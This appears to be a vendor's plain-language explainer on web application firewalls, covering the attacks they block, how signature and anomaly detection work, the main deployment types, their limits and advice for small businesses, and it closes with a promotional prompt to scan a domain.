A web application firewall (WAF) sits between the internet and your web application and inspects every incoming HTTP request. Requests that match known attack patterns — SQL injection, cross-site scripting, path traversal, malicious bots — get blocked before they ever reach your code. Legitimate traffic passes through unchanged.
Think of it as a bouncer for your web server: it doesn't change what your application does, it just decides what is allowed to talk to it.
What a WAF protects against
WAFs are designed to block the OWASP Top 10 — the ten most common web application attack types. The main ones:
- SQL injection — attempts to manipulate database queries through user input
- Cross-site scripting (XSS) — injecting malicious scripts into pages viewed by other users
- Cross-site request forgery (CSRF) — tricking authenticated users into making unwanted requests
- Path traversal / directory traversal — requesting files outside the web root
- Remote file inclusion — loading remote malicious code as a file
- Broken access control — requests attempting to access admin pages or other users' data
- Bot traffic and scraping — automated abuse, credential stuffing, rate-limit evasion
How WAFs work: rules and anomaly detection
Most WAFs use two approaches, often combined:
Rule-based (signature) matching — the WAF maintains a list of known attack patterns
(strings like UNION SELECT, <script> in input, unusual URL patterns) and blocks
requests that match. Rules are maintained and updated by the WAF vendor. This catches known attacks reliably
but can miss novel ones.
Anomaly / rate-based detection — the WAF watches for behaviour that deviates from normal baselines: hundreds of requests per second from one IP, repeated authentication failures, unusual geographic patterns. This catches automated abuse and some zero-day attempts.
Types of WAF
- Cloud-based WAF (most common) — traffic is routed through the provider's network, which inspects and filters it before forwarding clean requests to your server. Cloudflare, AWS WAF, Fastly, Imperva and Akamai all offer this. Low setup friction, scales automatically, managed rule updates. A free tier is available on Cloudflare for basic protection.
- Host-based WAF — installed on your web server (e.g. ModSecurity on Nginx/Apache). No external routing required, but you're responsible for rules and updates.
- Network appliance — a dedicated hardware or virtual device in your data centre. Common in enterprises with strict data-residency requirements.
What a WAF doesn't protect
A WAF inspects HTTP traffic — it can't protect everything:
- Logic flaws — a WAF can't know your business rules. If your application lets any logged-in user view any other user's invoices, a WAF won't catch that.
- Broken authentication — weak passwords, missing MFA, session management bugs.
- Server-side misconfigurations — exposed admin panels, default credentials, missing security headers, open S3 buckets.
- Supply-chain attacks — a compromised third-party script or dependency.
- Email-based attacks — phishing, spoofing and BEC are entirely out-of-band from your web traffic.
A WAF is one layer. It doesn't replace secure coding, proper authentication, security headers, email authentication or regular scanning.
Do small businesses need a WAF?
If your site runs an e-commerce checkout, a login flow, or any user-submitted data — yes, a WAF adds meaningful protection for relatively little effort. Cloudflare's free plan, for example, gives you a WAF with managed OWASP rules, DDoS protection and a CDN just by changing your DNS to route through their network. For a WordPress site or a WooCommerce store, this is one of the most impactful things you can do for under an hour of setup time.
For a purely static informational site with no logins or forms, the risk is lower — but the protection is still cheap enough that there's little reason to skip it.
WAF vs other controls
| Control | Protects against | What it doesn't cover |
|---|---|---|
| WAF | OWASP Top 10, bots, DDoS | Logic flaws, email attacks |
| Security headers | XSS, clickjacking, downgrade | Server-side attacks |
| Email auth (SPF/DKIM/DMARC) | Spoofing, phishing | Web vulnerabilities |
| Regular scanning | Misconfiguration, missing records | Zero-days in code |
How to check your site's current protections
Start with what's visible from the outside: your DNS and email security records, your HTTPS setup and your response headers. A passive scan checks all of these at once and tells you, in plain English, what's missing. It can't see your WAF rules or your application code — but it surfaces the gaps that are easiest to find and most commonly exploited. Scan your domain free and see your grade in about ten seconds.